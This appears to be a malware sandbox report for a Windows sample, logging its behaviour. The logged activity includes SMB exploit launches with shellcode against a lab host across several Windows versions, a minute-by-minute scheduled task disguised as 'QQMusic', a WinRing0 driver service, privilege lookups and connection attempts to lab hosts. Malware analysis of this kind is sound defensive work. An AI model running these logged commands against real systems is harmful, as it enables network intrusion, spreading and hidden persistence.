cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
cmdline svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
file C:\ProgramData\svchostromance.exe
file C:\ProgramData\svchostlong.exe
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "spreadEmnopq.exe")
section .rsrc (virtual_address 0x00397000, virtual_size 0x0053a990, size_of_data 0x0053aa00) entropy 7.93385947196 description A section with a high entropy has been found
entropy 0.58321533602 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline taskkill /f /im spreadEmnopq.exe
cmdline ipconfig /flushdns
cmdline schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
cmdline schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
Time & API Arguments Status Return Repeated

CreateServiceW

service_start_name:
start_type: 3
password:
display_name: WinRing0_1_2_0
filepath: C:\ProgramData\WinRing0x64.sys
service_name: WinRing0_1_2_0
filepath_r: C:\ProgramData\WinRing0x64.sys
desired_access: 983551
service_handle: 0x00000000002d4d60
error_control: 1
service_type: 1
service_manager_handle: 0x00000000002d4d30
1 2968928 0
dead_host 192.168.56.101:49373
dead_host 192.168.56.101:49629
dead_host 192.168.56.103:1433
dead_host 192.168.56.103:19490
dead_host 192.168.56.1:19490
dead_host 192.168.56.1:21
dead_host 192.168.56.101:50767
dead_host 192.168.56.1:135
dead_host 192.168.56.101:50801
dead_host 192.168.56.101:49184
dead_host 192.168.56.101:49291
dead_host 192.168.56.101:50222
dead_host 192.168.56.1:445
dead_host 192.168.56.101:50778
dead_host 192.168.56.101:49928
dead_host 192.168.56.101:50587
dead_host 192.168.56.101:50640
dead_host 192.168.56.1:1433
dead_host 192.168.56.103:21
dead_host 192.168.56.101:50004